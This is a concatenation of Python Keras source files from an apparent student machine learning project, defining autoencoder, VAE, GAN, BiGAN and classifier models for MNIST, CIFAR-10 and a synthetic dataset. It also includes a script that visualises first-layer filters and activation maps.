53,479 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/mnist_conv_ae_models.py | from keras.layers import Conv2D, MaxPooling2D, UpSampling2D, Flatten, Dense, Dropout, Activation, Reshape
from keras.models import Sequential
# Define models
def encoder_model():
    """Build the convolutional encoder: 28x28x1 image -> flat 128-d code.

    Spatial path (all poolings use 'same' padding): 28x28 -> 14x14 -> 7x7
    -> 4x4 with 8 channels at the end, giving 4*4*8 = 128 features.

    Fix: the original appended a second ``Activation('relu')`` directly
    after the final max-pooling.  ReLU applied to already non-negative
    values is the identity, so that layer was a no-op and is dropped here.
    Activation layers carry no weights, so previously saved checkpoints
    should still load — TODO confirm against the Keras version in use.
    """
    model = Sequential()
    model.add(Conv2D(16, kernel_size=(3, 3), padding='same', input_shape=(28, 28, 1)))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
    model.add(Conv2D(8, (3, 3), padding='same'))
    model.add(Activation('relu'))
    model.add(MaxPooling2D((2, 2), padding='same'))
    model.add(Conv2D(8, (3, 3), padding='same'))
    model.add(Activation('relu'))
    model.add(MaxPooling2D((2, 2), padding='same'))
    model.add(Flatten())
    return model
def decoder_model():
    """Map a 128-d latent code back to a 28x28x1 image with values in [0, 1].

    Spatial path: 4x4 -> 8x8 -> 16x16 -> 14x14 -> 28x28.  The third
    convolution uses default 'valid' padding on purpose so the final
    upsampling lands exactly on 28x28.
    """
    stages = [
        Reshape((4, 4, 8), input_shape=(128,)),
        Conv2D(8, kernel_size=(3, 3), padding='same'),
        Activation('relu'),
        UpSampling2D((2, 2)),
        Conv2D(8, (3, 3), padding='same'),
        Activation('relu'),
        UpSampling2D((2, 2)),
        Conv2D(16, (3, 3)),  # 'valid' padding: 16x16 -> 14x14
        Activation('relu'),
        UpSampling2D((2, 2)),
        Conv2D(1, (3, 3), padding='same'),
        Activation('sigmoid'),
    ]
    model = Sequential()
    for stage in stages:
        model.add(stage)
    return model
def autoencoder_model(encoder, decoder):
    """Chain *encoder* and *decoder* into one end-to-end autoencoder."""
    return Sequential([encoder, decoder])
def classifier_e_frozen_model(encoder):
    """10-way softmax classifier head on top of a frozen encoder.

    The encoder's weights are marked non-trainable, so only the dense head
    learns during classifier training.
    """
    encoder.trainable = False
    clf = Sequential()
    for layer in (encoder,
                  Flatten(),
                  Dense(128, activation='relu'),
                  Dropout(0.5),
                  Dense(10, activation='softmax')):
        clf.add(layer)
    return clf
def classifier_e_trainable_model(encoder):
    """Same classifier head as the frozen variant, but the encoder weights
    stay trainable and are fine-tuned together with the head."""
    clf = Sequential()
    clf.add(encoder)
    clf.add(Flatten())
    clf.add(Dense(128, activation='relu'))
    clf.add(Dropout(0.5))
    clf.add(Dense(10, activation='softmax'))
    return clf
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,480 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_plot_models.py | from cifar10_models import deterministic_encoder_model, generator_model
# Instantiate the CIFAR-10 encoder / generator, print their summaries and
# dump an architecture diagram of each to a PNG file.
from keras.utils.vis_utils import plot_model

encoder = deterministic_encoder_model()
encoder.summary()

generator = generator_model()
generator.summary()

graph1 = plot_model(encoder, to_file='cifar10_encoder.png', show_shapes=True)
graph2 = plot_model(generator, to_file='cifar10_generator.png', show_shapes=True)
"/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,481 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/mnist_conv_ae_visualize.py | import numpy as np
from keras import backend as K
from keras.datasets import mnist
from mnist_conv_ae_models import encoder_model, decoder_model
import matplotlib.pyplot as plt
# Visualize the first conv layer of a trained MNIST convolutional autoencoder:
# load saved encoder/decoder weights, then plot a test digit, its
# reconstruction, every first-layer filter, and each filter's activation map.
# Load saved models for encoder and decoder
e = encoder_model()
e.load_weights('encoder.h5')
#e.load_weights('mnist_encoder.h5')
d = decoder_model()
d.load_weights('decoder.h5')
#d.load_weights('mnist_decoder.h5')
# Get weights from first layer of encoder
weights0 = e.layers[0].get_weights()[0] # get weights
#weights0 = e.layers[0].get_weights()[1] # get biases
weights0 = np.array(weights0).transpose() # transpose into suitable shape for visualizing
# Load and format data
(x_train, _), (x_test, _) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1)) # adapt this if using `channels_first` image data format
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1)) # adapt this if using `channels_first` image data format
# Define function for mapping of first layer of encoder
layer_1_out = K.function([e.layers[0].input, K.learning_phase()],[e.layers[0].output])
# Keep only the first 9 test images (note: the slice 0:9 yields nine, not ten)
x_test = x_test[0:9,:,:,:]
recon_test = d.predict(e.predict(x_test))
img_num = 1 # choose image number (index into the 9 kept test images)
layer_1_activations = layer_1_out([x_test, 1])[0]
layer_1_activations = layer_1_activations[img_num].transpose() # transpose into shape suitable for plotting
# Visualization
# Display digit from test set along with the encoders filters and the activation map of this filter for each image
n = len(weights0)  # number of first-layer filters (axis 0 after the transpose above)
plt.figure(figsize=(20,20))
# Plot test digit
ax = plt.subplot(3, n, 1)
plt.imshow(x_test[img_num].reshape(28,28))
plt.gray()
plt.title('Test Set Digit')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# Plot reconstructed test digit
ax = plt.subplot(3, n, n)
plt.imshow(recon_test[img_num].reshape(28,28))
plt.gray()
plt.title('Reconstructed Digit')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
for i in range(n):
    # Display layer 1 features
    ax = plt.subplot(3, n, i + 1 + n)
    plt.imshow(weights0[i].reshape(3, 3))  # NOTE(review): assumes 3x3 kernels -- confirm against encoder_model()
    plt.gray()
    plt.title('Filter ' + str(i+1))
    ax.get_xaxis().set_visible(False)
    ax.get_yaxis().set_visible(False)
    # Display layer 1 activation map
    ax = plt.subplot(3, n, i + 1 + 2*n)
    plt.imshow(layer_1_activations[i].transpose())
    plt.gray()
    ax.get_xaxis().set_visible(False)
    ax.get_yaxis().set_visible(False)
# Give title to third row of images
plt.subplot(3, n, 1 + 1 + 2*n)
plt.title('Activation map of each filter')
plt.gray()
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,482 | davidhayes3/ME-Project | refs/heads/master | /common_models/common_models.py | from keras.layers import Input, Lambda
from keras.models import Sequential, Model
from keras import backend as K
def bigan_model(generator, encoder, discriminator, latent_dim, img_shape):
    """Wire generator, encoder and discriminator into a joint BiGAN.

    Returns a Model mapping [z, x] -> [D(z, G(z)), D(E(x), x)].
    """
    latent_in = Input(shape=(latent_dim,))
    img_in = Input(shape=img_shape)
    generated_img = generator(latent_in)
    encoded_latent = encoder(img_in)
    score_fake = discriminator([latent_in, generated_img])
    score_real = discriminator([encoded_latent, img_in])
    return Model([latent_in, img_in], [score_fake, score_real])
def gan_model(generator, discriminator):
    """Stack the generator into the discriminator for the generator's training pass."""
    stacked = Sequential()
    for stage in (generator, discriminator):
        stacked.add(stage)
    return stacked
def autoencoder_model(encoder, decoder):
    """Compose encoder and decoder into a full autoencoder: x -> decoder(encoder(x))."""
    pipeline = Sequential()
    for part in (encoder, decoder):
        pipeline.add(part)
    return pipeline
def aae_model(encoder, decoder, discriminator, img_shape):
    """Adversarial autoencoder: x -> [decoder(encoder(x)), discriminator(encoder(x))]."""
    img_in = Input(shape=img_shape)
    code = encoder(img_in)
    reconstruction = decoder(code)
    code_validity = discriminator(code)
    return Model(img_in, [reconstruction, code_validity])
def latent_reconstructor_model(d, e):
    """Chain decoder d with encoder e: z -> e(d(z)) (latent round-trip)."""
    chained = Sequential()
    for part in (d, e):
        chained.add(part)
    return chained
def vae_encoder_sampling_model(encoder, latent_dim, img_shape, epsilon_std):
    """Wrap a (mean, log-var) encoder with the VAE reparameterization step.

    Returns a Model mapping an image x to a latent sample
    z = mu(x) + exp(log_var(x) / 2) * eps, where eps ~ N(0, epsilon_std^2).
    """
    x = Input(shape=img_shape)
    # Define sampling function (reparameterization trick: the random draw is
    # kept outside the gradient path so the model stays differentiable)
    def sampling(args):
        z_mean, z_log_var = args
        epsilon = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),
                                  mean=0., stddev=epsilon_std)
        return z_mean + K.exp(z_log_var / 2) * epsilon
    z_mean, z_log_var = encoder(x)
    z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
    return Model(x, z)
def vae_model(vae_encoder_sample, generator, img_shape):
x = Input(shape=img_shape)
z = vae_encoder_sample(x)
recon_x = generator(z)
return Model(x, recon_x) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,483 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_models.py | from keras.models import Sequential, Model
from keras.layers import Dense, Activation, Input, LeakyReLU, Dropout, concatenate, BatchNormalization, Lambda, Flatten, Reshape
from keras.regularizers import l1
import keras.backend as K
import numpy as np
# =====================================
# Define constants
# =====================================
img_rows = 2  # height of the tiny synthetic "images"
img_cols = 2  # width of the tiny synthetic "images"
channels = 1  # single channel
img_shape = (img_rows, img_cols, channels)
latent_dim = 2  # 2-D code; presumably chosen so the latent space can be plotted directly
# =====================================
# Define models
# =====================================
def encoder_model():
    """Deterministic MLP encoder: img_shape -> latent_dim code."""
    net = Sequential()
    net.add(Flatten(input_shape=img_shape))
    # Two identical hidden stages: Dense -> LeakyReLU -> BatchNorm
    for _ in range(2):
        net.add(Dense(512))
        net.add(LeakyReLU(alpha=0.2))
        net.add(BatchNormalization(momentum=0.8))
    net.add(Dense(latent_dim))
    return net
def sparse_encoder_model():
    """MLP encoder with L1 activity regularization to push hidden codes toward sparsity."""
    net = Sequential()
    net.add(Flatten(input_shape=img_shape))
    # Two identical hidden stages; l1(10e-5) penalizes large activations
    for _ in range(2):
        net.add(Dense(512, activity_regularizer=l1(10e-5)))
        net.add(LeakyReLU(alpha=0.2))
        net.add(BatchNormalization(momentum=0.8))
    net.add(Dense(latent_dim))
    return net
def vae_encoder_model():
    """VAE encoder producing two heads: (z_mean, z_log_var), each of size latent_dim."""
    img_in = Input(shape=img_shape)
    h = Flatten()(img_in)
    # Shared trunk: two Dense -> LeakyReLU -> BatchNorm stages
    for _ in range(2):
        h = Dense(512)(h)
        h = LeakyReLU(alpha=0.2)(h)
        h = BatchNormalization(momentum=0.8)(h)
    mean_head = Dense(latent_dim)(h)
    log_var_head = Dense(latent_dim)(h)
    return Model(img_in, [mean_head, log_var_head])
def generator_model(gan=False):
    """MLP generator/decoder mapping a latent_dim code to an img_shape output.

    Args:
        gan: if False (default), the output activation is sigmoid (outputs in
            [0, 1]); otherwise tanh -- presumably because GAN training data is
            rescaled to [-1, 1] (TODO confirm against the training scripts).
    """
    model = Sequential()
    model.add(Dense(512, input_shape=(latent_dim,)))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Dense(512))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Dense(np.prod(img_shape)))
    model.add(Reshape(img_shape))
    # The original pair of tests (`gan is False` / `gan is not False`) were
    # mutually exclusive and exhaustive; collapse them into one if/else.
    if gan is False:
        model.add(Activation('sigmoid'))
    else:
        model.add(Activation('tanh'))
    return model
def bigan_discriminator_model():
    """BiGAN discriminator scoring (latent code, image) pairs as real or fake.

    The latent code and the flattened image are processed by separate MLP
    branches, concatenated, and reduced to a single sigmoid probability.
    """
    # Latent-code branch
    z_in = Input(shape=(latent_dim,))
    z = Dense(512)(z_in)
    z = LeakyReLU(alpha=0.2)(z)
    z = Dropout(0.5)(z)
    z = Dense(512)(z)
    z = LeakyReLU(alpha=0.2)(z)
    # Image branch
    x_in = Input(shape=img_shape)
    x = Flatten()(x_in)
    x = Dense(512)(x)
    x = LeakyReLU(alpha=0.2)(x)
    x = Dropout(0.5)(x)
    x = Dense(512)(x)
    x = LeakyReLU(alpha=0.2)(x)
    # Joint head over the concatenated branch outputs
    c = concatenate([z, x])
    c = Dropout(0.5)(c)
    c = Dense(1024)(c)
    c = LeakyReLU(alpha=0.2)(c)
    c = Dropout(0.5)(c)
    c = Dense(1)(c)
    validity = Activation('sigmoid')(c)
    return Model([z_in, x_in], validity)
def gan_discriminator_model():
    """GAN discriminator: img_shape -> sigmoid probability that the image is real."""
    net = Sequential()
    net.add(Flatten(input_shape=img_shape))
    # Three hidden stages: Dense -> LeakyReLU -> Dropout, widening at the end
    for width in (512, 512, 1024):
        net.add(Dense(width))
        net.add(LeakyReLU(alpha=0.2))
        net.add(Dropout(0.5))
    net.add(Dense(1))
    net.add(Activation('sigmoid'))
    return net
def aae_discriminator_model():
    """AAE discriminator over latent codes: latent_dim -> real/fake probability."""
    net = Sequential()
    net.add(Dense(512, input_shape=(latent_dim,)))
    net.add(LeakyReLU(alpha=0.2))
    net.add(Dropout(0.5))
    # Two more hidden stages with the same activation/dropout pattern
    for width in (512, 1024):
        net.add(Dense(width))
        net.add(LeakyReLU(alpha=0.2))
        net.add(Dropout(0.5))
    net.add(Dense(1))
    net.add(Activation('sigmoid'))
    return net
def bigan_model(generator, encoder, discriminator):
    """Joint BiGAN model: [z, x] -> [D(z, G(z)), D(E(x), x)]."""
    z = Input(shape=(latent_dim,))
    # NOTE(review): x is declared flat (prod(img_shape),) while encoder_model()
    # in this file starts with Flatten(input_shape=img_shape) -- confirm the
    # shapes agree with how this model is actually driven.
    x = Input(shape=(np.prod(img_shape),))
    x_ = generator(z)
    z_ = encoder(x)
    fake = discriminator([z, x_])
    valid = discriminator([z_, x])
    return Model([z, x], [fake, valid])
def gan_model(generator, discriminator):
    """Stack generator into discriminator for the generator's training pass."""
    combined = Sequential()
    for stage in (generator, discriminator):
        combined.add(stage)
    return combined
def autoencoder_model(encoder, decoder):
    """Compose encoder and decoder into a full autoencoder."""
    pipeline = Sequential()
    for part in (encoder, decoder):
        pipeline.add(part)
    return pipeline
def aae_model(encoder, decoder, discriminator):
    """Adversarial autoencoder: x -> [decoder(encoder(x)), discriminator(encoder(x))]."""
    # NOTE(review): x is declared flat (prod(img_shape),) while encoder_model()
    # in this file begins with Flatten(input_shape=img_shape) -- verify the
    # intended input layout.
    x = Input(shape=(np.prod(img_shape),))
    enc_x = encoder(x)
    recon_x = decoder(enc_x)
    validity = discriminator(enc_x)
    return Model(x, [recon_x, validity])
def latent_reconstructor_model(d, e):
    """Latent round-trip: z -> e(d(z))."""
    chained = Sequential()
    for part in (d, e):
        chained.add(part)
    return chained
def sampling(args):
    """Reparameterization trick: z = z_mean + exp(z_log_var / 2) * eps, eps ~ N(0, 1).

    `args` is the pair of tensors (z_mean, z_log_var) produced by the VAE encoder.
    """
    z_mean, z_log_var = args
    epsilon = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),
                              mean=0., stddev=1.0)
    return z_mean + K.exp(z_log_var / 2) * epsilon
def vae_model(encoder, generator):
    """End-to-end VAE: x -> sampled latent via reparameterization -> reconstruction."""
    img_in = Input(shape=img_shape)
    mean_t, log_var_t = encoder(img_in)
    latent_sample = Lambda(sampling)([mean_t, log_var_t])
    decoded = generator(latent_sample)
    return Model(img_in, decoded)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", 
"/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,484 | davidhayes3/ME-Project | refs/heads/master | /common_models/classifier_models.py | from keras.models import Sequential
from keras.layers import Flatten, Dense, Dropout, Activation
def classifier_e_frozen_model(encoder):
    """10-way softmax classifier head on top of a frozen encoder (encoder weights fixed)."""
    encoder.trainable = False
    clf = Sequential()
    clf.add(encoder)
    # Two Dense(128)+relu stages with increasing dropout
    for drop_rate in (0.25, 0.5):
        clf.add(Dense(128))
        clf.add(Activation('relu'))
        clf.add(Dropout(drop_rate))
    clf.add(Dense(10))
    clf.add(Activation('softmax'))
    return clf
def classifier_e_trainable_model(encoder):
    """10-way softmax classifier head; the encoder is fine-tuned along with the head."""
    clf = Sequential()
    clf.add(encoder)
    # Two Dense(128)+relu stages with increasing dropout
    for drop_rate in (0.25, 0.5):
        clf.add(Dense(128))
        clf.add(Activation('relu'))
        clf.add(Dropout(drop_rate))
    clf.add(Dense(10))
    clf.add(Activation('softmax'))
    return clf
def mnist_classifier_e_trainable_model(encoder):
    """MNIST 10-way classifier head; the encoder is trainable (fine-tuned)."""
    clf = Sequential()
    for layer in (encoder,
                  Dense(128, activation='relu'),
                  Dropout(0.5),
                  Dense(10, activation='softmax')):
        clf.add(layer)
    return clf
def mnist_classifier_e_frozen_model(encoder):
model = Sequential()
encoder.trainable = False
model.add(encoder)
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='softmax'))
